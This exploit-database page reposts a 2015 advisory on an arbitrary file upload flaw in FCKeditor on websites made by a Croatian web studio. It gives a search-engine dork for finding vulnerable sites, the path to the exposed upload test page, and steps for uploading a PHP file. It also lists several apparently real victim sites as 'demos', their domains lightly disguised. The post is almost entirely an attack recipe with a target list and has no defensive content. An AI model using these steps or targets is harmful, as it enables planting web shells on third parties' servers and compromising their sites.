Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-434 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2015-04-24 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H | 0.02192 | 0.50148 |
[+] izrada (fckeditor) Arbitrary File Upload Vulnerability [+] Exploit Title : izrada (FCKEDITOR) [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://it-b.hr [+] Google Dork : intext:izrada web stranica: I.T.B. [+] Date: 2015-04-23 [+] Tested On : Windows 7 / Mozilla Firefox [+] Version : All Version [+] exploit => fckeditor/editor/filemanager/connectors/uploadtest.html [+] first go to => http://site.com/[path] [+] then => http://www.site.com/[path]/fckeditor/editor/filemanager/connectors/uploadtest.html [+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL: [+] demos : [+] http://croatiaX-flyfishing.com/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://lagirl-Xcosmetics.eu/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://mbbXs.hr/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://maXgic-records-shop.com/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://saXding-inox.hr/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://sXcp.hr/fckeditor/editor/filemanager/connectors/uploadtest.html [+] Special Tnx Mahdi.Hidden - ACC3SS [+][+][+][+][+][+][+][+][+][+][+] [+]Discovered By : Cyb3r_Dr4in[+] [+][+][+][+][+][+][+][+][+][+][+]
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.